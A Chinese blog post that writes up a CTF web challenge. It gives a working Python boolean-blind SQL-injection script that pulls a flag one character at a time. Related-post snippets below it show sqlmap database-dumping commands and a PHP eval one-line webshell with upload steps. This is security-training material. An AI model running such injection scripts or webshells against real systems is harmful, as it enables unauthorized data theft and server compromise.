RDCTF(web:mangzhu)

最新推荐文章于 2023-03-03 11:10:46 发布
最新推荐文章于 2023-03-03 11:10:46 发布
阅读量182 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50401030/article/details/108786079
版权

  • 1 进入网站

在这里插入图片描述
输入1 得到的是
在这里插入图片描述
输入2得到的是
在这里插入图片描述
从这里可以找到一个不同的地方,开始写python代码

import requests 
flag=""
a = "Hello, glzjin wants a girlfriend." #成功后的显示
url = "http://localhost/index.php" #题目网址
for i in range(1,50):
    for j in range(1,128):       #两个循环
        payload = "if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)".format(i,j)  #运行这个代码,使用循环找到这两个数
        aaa = {'id': payload}    #将这两个数配成字典
        r = requests.post(url, data=aaa)   
        b = r.text
        if a in b:          #如果a是在b里面则记入到flag里面
            flag += chr(j)
            print(flag)
            break


结束!

haozhu945
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入学习-RDCTF靶机实战1
qq_46231152的博客
09-10 318
sqlmap的安装 1.获取sqlmap压缩包 2.解压后将其添加进入环境变量 3.打开命令行窗口输入sqlmap.py运行 sqlmap的使用 本次使用的命令 sqlmap.py -u {URL} //查看是否有注入点 sqlmap.py -u {URL} -dbs //爆数据库 sqlmap.py -u {URL} -D db --tables //爆数据表 sqlmap.py -u {URL} -D db -T table --columns //爆字段 sqlmap.py -u {URL} -D
[CISCN2019 华北赛区 Day2 Web1] web题-Hack World
BROTHERYY的博客
07-08 338
复现环境:buuoj.cn 输入0:Error Occured When Fetch Result. 输入1:Hello, glzjin wants a girlfriend. 输入2:Do you want to be my girlfriend? 输入3:Error Occured When Fetch Result. 题目提示信息说表名和字段名都是flag,给出id就能得到flag 贴出代码 import requests import time import re url='' flag = ''
RDCTF-faka
weixin_50401030的博客
09-19 422
进入题目找到注入点 找到注入的地方,发现购买那就是一个注入点 利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可,先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 sqlmap -r F:\a.txt -D --tables faka 因为题目名字是faka所以跑faka的表 sqlmap -r F:\a.txt -D faka --tables 接着跑表 -r F:\a.txt -D faka -T ayangw_config..
RDCTF SHIZHAN1
sweetie 的博客
09-14 167
RDCTF SHIZHAN1 拿到题目进入网站 加上robots.txt 按照提示加上/admins/ 登入之前拿到的密码 进入网站后台 寻找注入点 点击附件管理 上传附件 文件内容(一句话木马) 找到刚刚上传的软件 点击在新窗口打开 得到url 打开蚁剑 链接 看代码表示flag在home文件夹里面 双击flag 成功! ...
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 286
rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_74911687的博客
03-03 583
BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World
FUZZ题目讲解
qq_46540840的博客
04-28 2957
FUZZ讲解 文章目录FUZZ讲解前言使用方法补充知识点构造的代码 前言 何为Fuzz简单来说就是模糊测试 模糊测试(fuzz testing)是一种介于完全的手工渗透测试与完全的自动化测试之间的安全性测试类型 就是一遍一遍的去尝试 使用方法 拿buuctf 一道注入题来说 [CISCN2019 华北赛区 Day2 Web1]Hack World 输入1,2,3 分别有不同显示内容分别是 Hello, glzjin wants a girlfriend Do you want to be my gi
BUUCTF闯关日记--[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_64201116的博客
05-22 331
可恶,明明当初想着是写给自己看的,文章越写越多,越来越在意别人会不会看我的文章了,还是太功名利禄了,我得清高点(这是写给自己看,这是写给自己看,这是写给自己看) 进入页面,可以看到只有一个白框,多半是SQL注入 直接开始做题 输入:1 回显:Hello, glzjin wants a girlfriend. 输入:2 回显:Do you want to be my girlfriend? 判断一下是否存在sql注入 分别输入 1+1 2-1 1*1 2/2 //只有2/2有运算后的
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
风过江南乱的博客
06-28 2616
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
Web安全-用一句话木马拿下RDCTF靶机实战1
qq_46231152的博客
09-15 617
一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 本次使用的php一句话: <?php @eval($_POST['1']) ?> 用这段代码保存为一个php后门木马 上传木马 本次使用的是RDCTF平台的靶机实战 进入管理员后台界面 找到附件管理,发现了这里可以上传文件 将写好的一句话木马上传 回到首页,找到文件上传的网页 找到一句话木马文件 使用蚁剑连接 拿到flag ...
web:mangzhu试题
qq_45970858的博客
09-29 170
输入1,提交,出现Hello, glzjin wants a girlfriend. 输入2,提交,出现Do you want to be my girlfriend? 输入其他数字提交,出现Error Occured When Fetch Result. 发现此题为盲注,根据提示写脚本 import requests flag = “” a = “Hello, glzjin wants a girlfriend.” #成功后的显示 url = “http://935d4641..
RDCTF-考核
qq_45970858的博客
09-23 345
复制网站并打开找到注入点 找到注入的地方,发现购买那里是一个注入点 此处可利用burp suite进行抓包 发现了一个能注入的点,利用post注入即可, 先将代码压缩成一个文件然后再用sqlmap跑 接着利用sqlmap跑数据库 python sqlmap.py -r c:\lyf\POST.txt -dbs 因为题目名字是faka所以跑faka的表 python sqlmap.py -r c:\lyf\POST.txt -D faka --tables 再跑字段 python sql
CTF在线练习平台
weixin_41949487的博客
02-25 4333
CTF在线练习平台 IDF实验室: http://ctf.idf.cn/ XCTF_OJ竞赛平台:http://oj.xctf.org.cn/problem_archives 网络信息安全攻防学习平台:http://hackinglab.cn/ OWASP在线网络安全攻防实验室:http://www.owasp.org.cn/owasp-project/security-l...
【ctf】基于python脚本的sql注入合集(持续更新)
woodwhale的博客
05-14 6086
基于python脚本的sql注入合集(持续更新) 前言 sql注入在ctf的web方向中是常见提醒。简单的sql注入用sqlmap跑一跑自然而然就跑出来了。这篇文章是针对sqlmap跑起来困难的题目,也就是用python写脚本来跑的题目。 那么这种写脚本的题目也有不同的注入方式,例如布尔盲注、时间盲注、异或注入等等,都是通过写脚本来获取sql信息的。这篇文章就写下我认为比较有价值的写脚本题型! 布尔盲注 分析题目 N1BOOK [第一章 web入门]SQL注入-2 这题其实有很多解法,这里我选择比较简答的
web安全的一句话木马
IerkeU的博客
12-13 2269
一、WEBshell Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与
PPO算法,即Proximal Policy Optimization(近端策略优化).pdf
08-05
PPO算法,即Proximal Policy Optimization(近端策略优化),是一种在强化学习领域中广泛应用的策略梯度方法。由OpenAI在2017年提出,PPO旨在解决传统策略梯度方法中策略更新过大导致的训练不稳定问题。它通过引入限制策略更新范围的机制,在保证收敛性的同时提高了算法的稳定性和效率。 一、PPO算法简介 PPO算法的核心思想是通过优化一个特定的目标函数来更新策略,但在这个过程中严格限制策略变化的幅度。具体来说,PPO引入了裁剪(Clipping)和信赖域(Trust Region)的概念,以确保策略在更新过程中不会偏离太远,从而保持训练的稳定性。 二、PPO算法的主要变体 PPO算法主要有两种变体:裁剪版(Clipped PPO)和信赖域版(Adaptive KL Penalty PPO)。其中,裁剪版PPO更为常见,它通过裁剪概率比率来限制策略更新的幅度,而信赖域版PPO则使用KL散度作为约束条件,并通过自适应调整惩罚系数来保持策略的稳定更新。PPO算法,即Proximal Policy Optimization(近端策略优化),是一种在强化学习领域中广
GC032A datasheet(侵删)
08-05
GC032A datasheet(侵删)
opencv的概要介绍与分析
08-05
OpenCV (Open Source Computer Vision Library) 是一个开源的计算机视觉和机器学习软件库。它提供了大量的算法和函数,可用于图像处理、视频分析、特征检测、对象识别等多种应用。下面是一些关于 OpenCV 的资源描述,帮助您学习和使用这项强大的技术。 ### OpenCV 资源描述 #### 1. **官方文档和GitHub仓库** - **GitHub 仓库**:OpenCV 的官方 GitHub 仓库是获取最新代码、预训练模型、开发指南和示例代码的地方。这是了解 OpenCV 最新进展和功能的最佳起点。 - **官方文档**:OpenCV 的官方文档包含了详细的使用说明、API 参考和常见问题解答。 #### 2. **在线教程和课程** - **Codecademy**:Codecademy 提供了互动式的 OpenCV 课程,适合完全的新手。 - **freeCodeCamp**:freeCodeCamp 是一个非营利性组织,提供免费的编码课程,包括 OpenCV 基础。 #### 3. **书籍** - **《Learning
基于python3+opencv3做的中国车牌识别源码+文档说明+使用说明
最新发布
08-05
<项目介绍> 算法思想来自于网上资源,先使用图像边缘和车牌颜色定位车牌,再识别字符。车牌定位在predict方法中,为说明清楚,完成代码和测试后,加了很多注释,请参看源码。车牌字符识别也在predict方法中,请参看源码中的注释,需要说明的是,车牌字符识别使用的算法是opencv的SVM, opencv的SVM使用代码来自于opencv附带的sample,Stat - 不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
不同版本yolo介绍大全.pdf
08-05
YOLO(You Only Look Once)是一种流行的目标检测算法系列,自2016年由Joseph Redmon等人提出以来,已经发展出多个版本,每个版本都在性能、速度和准确性上进行了不同程度的优化和改进。以下是对不同版本YOLO的详细介绍: 1. YOLOv1 核心特点:提出了一个统一的模型,能够在单次传递中直接从完整图像预测边界框和类别概率。 优点:速度快,可以达到实时检测;在大型目标上表现较好;利用卷积神经网络提取特征并直接预测边界框和类别;损失函数简单,易于训练和调整。 缺点:精度不高,特别是对小型物体的检测能力较弱;对于相互重叠的物体,只能检测其中一个;定位误差较大;无法检测长形物体。 2. YOLOv2(也称为Darknet-19) 改进:通过使用批量归一化、多尺度锚定框以及其他优化技术,对YOLOv1进行了改进。 优点:精度和速度均有所提升,检测准确率比YOLOv1更高;使用了batch normalization技术,有助于减轻过拟合问题。 缺点:一个分类器只能检测固定数量的物体,无法处理可变数量的物体;训练和调整模型需要更多的计算资源和时间。 3.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值